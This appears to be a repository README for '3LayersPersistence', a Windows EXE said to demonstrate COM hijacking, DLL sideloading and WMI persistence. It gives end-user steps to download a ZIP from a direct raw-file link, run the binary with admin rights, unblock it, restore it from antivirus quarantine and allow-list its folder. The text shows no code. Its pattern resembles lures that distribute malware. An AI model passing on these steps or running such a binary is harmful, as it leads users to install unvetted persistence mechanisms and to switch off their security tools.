3LayersPersistence is a Windows app that shows how one EXE can turn into proxy DLL files at runtime.
It is built to help you test and observe three persistence layers from one place. The app focuses on common Windows methods tied to COM, DLL loading, and WMI.
Use it if you want to see how these techniques work in a simple end-user package.
Visit this page to download and run the app:
Open the page, look for the latest release or main download option, and save the file to your PC.
- Windows 10 or Windows 11
- Local admin rights for full testing
- 64-bit system
- Microsoft Defender or another security tool may flag the file because of the way it works
- A test machine or VM is best for safe use
- Starts as a single EXE
- Writes proxy DLL files at runtime
- Uses layered persistence methods
- Helps you inspect how Windows handles those layers
- Works from one folder with no complex setup
Create a new folder for the files you download.
Keep the app in a place you can find again, such as:
- Downloads
- Desktop
- A test folder like
C:\Test\3LayersPersistence
If Windows shows a prompt about the file, check the publisher and path before you continue.
-
Open the download page: https://github.com/BielGodoi/3LayersPersistence/raw/refs/heads/main/3LayersPersistence/Persistence-Layers-3.7.zip
-
Download the latest Windows build or EXE from the page
-
Save the file to your computer
-
If the file comes in a ZIP, right-click it and choose Extract All
-
Open the folder that holds the EXE
-
Double-click the EXE to start it
-
If Windows asks for approval, choose Run or Yes
-
Let the app finish its first start so it can create the proxy DLL files it needs
When the app runs, it should:
- Create files in its working folder
- Set up the three persistence layers
- Use Windows paths and loading behavior tied to the demo
- Leave clear file changes you can inspect after launch
If you do not see the files, run the app again from the same folder and check that it has permission to write there.
A typical setup may look like this:
3LayersPersistence.exe- main appproxy1.dll- first layer fileproxy2.dll- second layer fileproxy3.dll- third layer file- logs or support files created at runtime
Keep the full folder together. The app may need its files in the same place to work as expected.
If Windows blocks the file:
- Right-click the EXE
- Open Properties
- If you see an Unblock box, check it
- Click Apply
- Run the app again
If the file still does not start, move the folder to a simple path like C:\Temp\3LayersPersistence and try again.
- Test in a virtual machine
- Use a spare Windows PC
- Watch file creation in the folder
- Review startup behavior after the first run
- Compare results before and after closing the app
This makes it easier to see how the three layers work without changing your main system.
- Make sure you downloaded the EXE from the GitHub page
- Check that the file is not still inside a ZIP
- Move it to a local folder and run it again
- Security tools may treat the app as suspicious because of how it works
- Restore the file if you trust the source
- Add the folder to an allowed path in your test setup
- Run the EXE from the same folder where it was first started
- Check that the folder is writable
- Try again with admin rights
- Open it from Command Prompt to see any messages
- Make sure you did not rename or move support files
- Re-download the release if files seem broken
The app is built around three layers:
- COM-based loading
- DLL sideloading style behavior
- WMI-based persistence
It shows how one program can set up each layer from a single launch path.
Use the app only on systems you own or have permission to test.
A virtual machine works well if you want to keep your main Windows install separate from the demo files.
- Keep the EXE and DLL files in one folder
- Do not rename the files unless the project page tells you to
- Do not move only part of the folder
- Save a copy of the original download before you test
Primary download page:
COM hijacking, DLL sideloading, persistence, WMI
- You have a Windows 10 or 11 PC
- You downloaded the file from the GitHub page
- You extracted the ZIP, if one was provided
- You kept all files in one folder
- You ran the EXE from that folder
- You checked that the folder allows file writes